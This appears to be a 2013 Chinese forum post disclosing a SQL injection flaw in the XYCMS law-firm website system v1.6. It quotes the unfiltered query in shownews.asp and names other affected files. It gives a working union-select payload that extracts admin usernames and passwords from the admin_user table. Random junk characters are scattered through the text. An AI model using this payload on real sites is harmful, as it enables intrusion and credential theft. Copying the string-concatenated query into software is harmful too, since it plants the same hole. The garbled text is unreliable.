前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
0 m( P+ q W: }" n" O! F
5 ]$ A) Q0 m/ G, G8 N淫荡分割线 h& k2 h( M+ m0 @9 `( E5 Y
--------------------------------------------------------
* C6 s% C8 r; I* \( X0 ?
1 @# Q9 C6 f1 q审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
9 v/ E$ U4 o4 v0 Q" u g% {源码地址:http://down.chinaz.com/soft/29233.htm8 ~8 j8 a5 r/ u0 _/ N6 A! L% J
x. x0 x6 A) m6 p. X漏洞文件:shownews.asp, O! I! t$ Y8 s# X* @ U; D3 y
漏洞代码:7-13行8 [! @8 [8 y$ B) H3 w( W: G6 i& e$ Y& k
9 b0 ?( q/ Y3 i
Q% D8 Y/ V8 H% v, P<% 8 C6 n) c4 H0 @1 H8 ~$ B
id=request.QueryString("id")
3 t, w2 w3 D. K* J# m8 G+ { 0 s2 {# \7 X" q( r
set snews=server.createobject("adodb.recordset")
$ y5 I- h2 H( g% ]4 }exec="select * from [news] where id="&id7 Q6 o! I7 m' b6 B- a F2 o
snews.open exec,conn,1,1% g. H0 p) p& e3 @4 w% E
%>
- p( l/ M4 z9 J# W + b/ k9 e& o3 X$ ]8 }5 u. N5 B
7 O1 K& v& X T# C0 G, S1 Q X: _
什么过滤都没有 直造成注入
3 l" s5 F$ b8 Y9 a7 R; c8 j! I/ ` * p4 i3 s# ]' U, @: D
注入点:http://127.0.0.1:99/shownews.asp?id=xx/ j v: H4 E4 e2 u" L9 n
# v( U, x B3 w0 i- G其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
9 R& M. H& f$ a0 ~2 H' U, N
( D N' |0 M' a: d2 M% ?
1 @5 M7 [7 h7 l5 o J6 x9 W7 eexp: union select 1,admin,password,4,5,7 from admin_user
u6 b5 o0 O1 Z& y7 E
# X& i. D1 F; c5 E |
发表于 2013-4-4 17:28:12
收藏
支持
反对